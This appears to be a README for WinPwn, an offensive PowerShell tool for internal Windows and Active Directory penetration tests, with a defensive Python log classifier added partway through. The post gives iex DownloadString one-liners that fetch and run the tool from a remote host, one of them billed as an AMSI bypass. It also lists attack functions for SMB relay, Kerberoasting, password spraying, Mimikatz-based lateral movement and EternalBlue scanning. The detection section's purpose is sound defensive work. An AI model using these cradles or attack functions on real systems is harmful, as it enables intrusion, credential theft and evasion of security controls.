WinPwn is an automation tool for internal Windows penetration tests / AD security. In many past internal penetration tests I often had problems with the existing PowerShell recon / exploitation scripts due to missing proxy support.
I often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetration test processes as possible (reconnaissance as well as exploitation), and for the proxy reason,
I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known, large offensive security PowerShell projects. They are loaded into RAM via IEX DownloadString.
Any suggestions, feedback, Pull requests and comments are welcome!
Just import the modules with: Import-Module .\WinPwn.ps1
or: iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
For AMSI bypass use the following one-liner: iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')
If you find yourself stuck on a Windows system with no internet access – no problem at all, just use Offline_Winpwn.ps1; all scripts and executables are included.
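From the defender's side, the loading pattern described above (iex + WebClient.DownloadString, or the WinPwn script names themselves) is what PowerShell Script Block Logging (Event ID 4104) records. The following is an added example, not part of WinPwn or this post: a small Python classifier run over constructed ScriptBlockText samples that tags the download cradle and the script names named in the README.

```python
import re

# Constructed sample ScriptBlockText values in the style of Event ID 4104 entries;
# these are not real telemetry, only illustrative input for the classifier.
SAMPLE_SCRIPT_BLOCKS = [
    "iex (new-object net.webclient).downloadstring("
    "'https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')",
    "Import-Module .\\WinPwn.ps1",
    "Invoke-Expression (New-Object Net.WebClient).DownloadString("
    "'http://10.0.0.5/ObfusWinPwn.ps1')",  # constructed internal host
    "Get-ChildItem C:\\Users | Select-Object Name",
    "$wc = New-Object Net.WebClient; "
    "$wc.DownloadString('https://example.test/notes.txt') | Out-File notes.txt",
]

# Script file names the README above says the project ships under.
WINPWN_SCRIPTS = ("winpwn.ps1", "obfuswinpwn.ps1", "offline_winpwn.ps1")

# Download cradle: Invoke-Expression (or its iex alias) fed by DownloadString(...).
# A DownloadString without iex (last sample) is a plain fetch and is not tagged.
CRADLE_RE = re.compile(r"\b(iex|invoke-expression)\b.*downloadstring\s*\(",
                       re.IGNORECASE)


def classify_script_block(text):
    """Return the list of detection tags that apply to one ScriptBlockText."""
    tags = []
    if CRADLE_RE.search(text):
        tags.append("iex-downloadstring-cradle")
    lowered = text.lower()
    if any(name in lowered for name in WINPWN_SCRIPTS):
        tags.append("winpwn-script-name")
    return tags


def scan(blocks):
    """Map the index of each tagged block to its tags; untagged blocks are omitted."""
    hits = {}
    for index, block in enumerate(blocks):
        tags = classify_script_block(block)
        if tags:
            hits[index] = tags
    return hits


if __name__ == "__main__":
    for index, tags in scan(SAMPLE_SCRIPT_BLOCKS).items():
        print(index, tags, SAMPLE_SCRIPT_BLOCKS[index][:60])
```

Against real 4104 data the same function can be applied to the ScriptBlockText field of each event exported from the Microsoft-Windows-PowerShell/Operational log.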
Functions available after Import:
WinPwn -> Menu to choose attacks
Inveigh -> Executes Inveigh in a new console window, SMB-Relay attacks with session management (Invoke-TheHash) integrated
sessionGopher -> Executes SessionGopher, asking you for parameters
kittielocal
localreconmodules
domainreconmodules
Privescmodules -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords)
latmov -> Searches for systems with admin access in the domain for lateral movement. Mass-Mimikatz can be used afterwards on the found systems
shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)
groupsearch -> Get-DomainGPOUserLocalGroupMapping – find systems where you have admin access or RDP access via Group Policy mapping (Powerview / Powersploit)
Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
powerSQL -> SQL Server discovery, check access with current user, audit for default credentials + UNC path injection attacks
Sharphound -> Downloads Sharphound and collects information for the Bloodhound DB
adidnswildcard -> Create an Active Directory-integrated DNS wildcard record
MS17-10 -> Scan active Windows servers in the domain or all systems for the MS17-10 (Eternalblue) vulnerability
Sharpcradle -> Load C# files from a remote web server into RAM
DomainPassSpray -> DomainPasswordSpray attacks, one password for all domain users
Disclaimer
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.